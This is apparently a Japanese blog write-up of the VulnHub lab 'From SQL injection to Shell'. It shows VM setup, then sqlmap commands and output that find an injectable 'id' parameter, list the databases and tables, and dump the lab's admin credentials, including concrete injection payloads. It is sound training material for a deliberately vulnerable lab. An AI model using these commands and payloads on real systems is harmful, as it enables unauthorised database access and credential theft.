※自分が管理していないシステムへの攻撃は絶対に行わないでください.
公式サイト
ターゲットマシン
VulnHubのPentester Lab: From SQL injection to Shellを利用しました.
インストール
- VulnHubからISOをDL
- VirtualBoxを起動し新規
- 名前とオペレーティングシステム(O)
- 名前:Pentester Lab: From SQL injection to Shell
- タイプ:Linux
- Subtype:Ubuntu
- バージョン(V):Ubuntu (64-bit)
- 完了
- 名前とオペレーティングシステム(O)
- 作成した仮想マシンを選択し設定
- ネットワーク
- アダプター1
- 割り当て(A):ホストオンリーアダプター
- アダプター1
- ネットワーク
- 作成した仮想マシンを起動
- VirtualBoxVM
- 1でDLしたISOを選択
- マウントとブートのリトライ(M)
- プロンプトが返ってくるまで待機
user@debian:~$ - ターゲットマシンのIPアドレスを確認
ip a - 攻撃マシンのブラウザからターゲットマシンにアクセス
URL:http://[ターゲットマシンのIPアドレス]
- VirtualBoxVM
ペネトレーションテスト
- とりあえずメニューリンクを探索.
Home:http://192.168.56.112/all.php
test:http://192.168.56.112/cat.php?id=1
ruxcon:http://192.168.56.112/cat.php?id=2
2010:http://192.168.56.112/cat.php?id=3
All pictures:http://192.168.56.112/all.php
Admin:http://192.168.56.112/admin/login.php - test、ruxcon、2010に、クエリパラメータがあるので、いけるかな?
injectableとなっていて、最後にRDBMS情報も取得できているので、脆弱性ありですね.┌──(kali㉿kali)-[~/Study/VulnHub/pentester-lab-from-sql-injection-to-shell] └─$ sqlmap -u "http://192.168.56.112/cat.php?id=1" --batch ... [08:35:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') ... [08:35:49] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable ... [08:36:00] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable ... [08:36:00] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable [08:36:00] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 1606=1606 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1 AND (SELECT 1607 FROM(SELECT COUNT(*),CONCAT(0x71626b7871,(SELECT (ELT(1607=1607,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 9653 FROM (SELECT(SLEEP(5)))vhpf) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7871,0x615250654c62566b7368686f4e6b4c4843796a61416e67636b666355466666494e5641726d50617a,0x71787a6271),NULL-- - --- [08:36:00] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6 (squeeze) web application technology: PHP 5.3.3, Apache 2.2.16 back-end DBMS: MySQL >= 5.0 [08:36:00] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.112' [*] ending @ 08:36:00 /2025-08-20/ - DB情報を取得.
information_schemaと、photoblogがありますね.┌──(kali㉿kali)-[~/Study/VulnHub/pentester-lab-from-sql-injection-to-shell] └─$ sqlmap -u "http://192.168.56.112/cat.php?id=1" --dbs ... [08:45:30] [INFO] fetching database names available databases [2]: [*] information_schema [*] photoblog [08:45:30] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.112' [*] ending @ 08:45:30 /2025-08-20/ - テーブル情報を取得.
photoblog.usersにログイン情報かな.- infomation_schema
┌──(kali㉿kali)-[~/Study/VulnHub/pentester-lab-from-sql-injection-to-shell] └─$ sqlmap -u "http://192.168.56.112/cat.php?id=1" -D information_schema --tables ... [08:47:16] [INFO] fetching tables for database: 'information_schema' Database: information_schema [28 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMN_PRIVILEGES | | FILES | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | KEY_COLUMN_USAGE | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | STATISTICS | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | USER_PRIVILEGES | | VIEWS | | COLUMNS | | ENGINES | | EVENTS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | TABLES | | TRIGGERS | +---------------------------------------+ [08:47:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.112' [*] ending @ 08:47:16 /2025-08-20/ - photoblog
┌──(kali㉿kali)-[~/Study/VulnHub/pentester-lab-from-sql-injection-to-shell] └─$ sqlmap -u "http://192.168.56.112/cat.php?id=1" -D photoblog --tables ... [08:47:35] [INFO] fetching tables for database: 'photoblog' Database: photoblog [3 tables] +------------+ | categories | | pictures | | users | +------------+ [08:47:35] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.112' [*] ending @ 08:47:35 /2025-08-20/
- infomation_schema
- レコード情報を取得.
ログイン情報が見つかりましたー.┌──(kali㉿kali)-[~/Study/VulnHub/pentester-lab-from-sql-injection-to-shell] └─$ sqlmap -u "http://192.168.56.112/cat.php?id=1" -D photoblog -T users --dump --batch ... [08:53:08] [INFO] cracked password 'P4ssw0rd' for user 'admin' Database: photoblog Table: users [1 entry] +----+-------+---------------------------------------------+ | id | login | password | +----+-------+---------------------------------------------+ | 1 | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) | +----+-------+---------------------------------------------+ [08:53:17] [INFO] table 'photoblog.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.112/dump/photoblog/users.csv' [08:53:17] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.112' [*] ending @ 08:53:17 /2025-08-20/ - ログイン成功!
以上、SQLMapでのペネトレーションテストでした!